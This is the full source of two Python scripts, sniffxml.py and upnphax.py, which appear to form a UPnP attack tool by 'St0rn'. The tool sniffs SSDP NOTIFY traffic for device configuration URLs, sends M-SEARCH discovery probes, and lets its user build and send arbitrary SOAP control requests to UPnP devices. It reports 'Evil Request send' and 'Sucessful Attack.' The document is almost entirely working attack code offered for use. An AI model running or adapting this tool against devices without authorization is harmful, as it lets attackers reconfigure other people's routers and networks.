sniffxml.py: #!/usr/bin/env python # # sniffXML.py is a part of upnpHax.py # #Author: St0rn #Website: anbu-pentest.com # # from scapy.all import * from os import system ## Sniff NOTIFY packet to get some UPnP device XML Configuration url ## def sniffXML(): def upnp_sniff(p): if p.haslayer(UDP) and p.haslayer(Raw): if p[UDP].dport == 1900: if "NOTIFY *" in p[Raw].load: print "\n\n"+p[Raw].load try: sniff(prn=upnp_sniff, filter="udp") except: print "\n[-] Can't launch sniffer :/\n" system("/usr/bin/clear") print "\n[*] Waiting for XML configuration URL\n\n" sniffXML() upnphax.py: #!/usr/bin/env python # #Author: St0rn #Website: anbu-pentest.com # # from os import system from sys import exit from subprocess import Popen from socket import * from scapy.all import * ## Var ## conf=list() param=dict() cont=str() ## Func ## def help(): print " ################# Help #################\n" print " -------------- General --------------" print " i, info ......... Script Informations" print " c, clear ................. clear cli" print " e, exit ................ exit script" print " msearch:ip ...... Send msearch to ip" print " sniffxml . XML config file discovery" print " soap { ....... Configure Request" print " } ...... Stop configuration and send\n" print " -------- Configuration Syntax --------" print " Param:Value \n" print " ------- Configuration Commands -------" print " ip ................. UPnP Device IP" print " port ............... UPnP Device Port" print " ctrlurl .................... Control url" print " service ................ Service name" print " action .................. Action name" print " !args ..... Configure Action Arguments" print " ! . Stop Action Param Configuration\n" print " ########################################\n" def banner(): print "\n ########################################" print " # UPnP Hax #" print " # UPnP To The Max #" print " ########################################\n" def info(): print " UPnPHax is a script to exploit UPnP Vulnerabilities." print " Author: St0rn" print " Anbu-pentest.com" def clear(): system("/usr/bin/clear") def initSocket(ip,port): s=socket(AF_INET,SOCK_STREAM) s.connect((ip,int(port))) return s def msearch(target): req = 'M-SEARCH * HTTP/1.1\r\nHost:239.255.255.250:1900\r\nST:upnp:rootdevice\r\nMan:"ssdp:discover"\r\nMX:3\r\n\r\n' ip=IP(dst=target) udp=UDP(sport=random.randint(1,65535), dport=1900) pck = ip/udp/req try: rep = sr1(pck, verbose=0) print "\n%s" %rep[Raw].load except: print "\n [-] Can't send packet :/\n" def saopRequest(upnpDevice,port,url,service,action,paramDico): # SAOP Envelope content='<?xml version="1.0"?>' content+='<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">' content+='<s:Body>' content+='<u:%s xmlns:u="urn:schemas-upnp-org:service:%s:1">' %(action,service) ## Param gestion ## for param,value in paramDico.items(): content+='<%s>%s</%s>' %(param,value,param) ## End of param gestion content+='</u:%s>' %action content+='</s:Body>' content+='</s:Envelope>' # Header req='POST http://%s:%s/%s HTTP/1.0\r\n' %(upnpDevice,port,url) req+='Content-Type: text/xml;charset="utf-8"\r\n' req+='SOAPAction: "urn:schemas-upnp-org:service:%s:1#%s"\n\r' %(service,action) req+='User-Agent: UPnPHax\r\n' req+='Host: %s:%s\r\n' %(upnpDevice,port) req+='Content-Length: %s\r\n' %len(content) req+='\r\n' req+=content return req ## Main ## clear() banner() try: while True: rep=raw_input(" > ") """ Gestion command """ if rep.lower()=="i" or rep.lower()=="info": info() if rep.lower()=="h" or rep.lower()=="help": help() if rep.lower()=="c" or rep.lower()=="clear": clear() if rep.lower()=="e" or rep.lower()=="exit": exit(0) if "msearch" in rep.lower() and ":" in rep: msearch(rep.split(":")[1]) if "sniffxml" in rep.lower(): Popen("xterm -e python sniffxml.py", shell=True) if "soap" in rep.lower() and "{" in rep.lower(): while True: cont=raw_input(" ") if "}" in cont: """ creation paquet saop """ for i in conf: cmd,val=i.split(":") if cmd.lower()=="ip": ip=val if cmd.lower()=="port": port=val if cmd.lower()=="ctrlurl": ctrlurl=val if cmd.lower()=="service": service=val if cmd.lower()=="action": action=val """ Envoie """ try: sock=initSocket(ip,port) except: print "\n [-] Can't create socket.." exit(0) try: req=saopRequest(ip,port,ctrlurl,service,action,param) sock.send(req) print "\n [+] Evil Request send" rcv=sock.recv(65536) if "200 OK" in rcv: print " [+] Sucessful Attack\n" else: print " [-] Fail..\n" sock.close() except: print "\n [-] Can't send request.." exit(0) conf=list() break print " " elif ":" not in cont.lower() and "!" not in cont.lower(): print "\n [!] Syntax Error, this line is not saved\n" else: if "!args"in cont: while True: p=raw_input(" args> ") if ":" in p and "!" not in p: cmd,val=p.split(":") param[cmd]=val if ":" not in p and "!" not in p: print "\n [!] Syntax Error, this line is not saved\n" if p.lower()=="!": break else: conf.append(cont) except KeyboardInterrupt: print "\n e or exit + enter... Isn't difficult?!" exit(0)
St0rn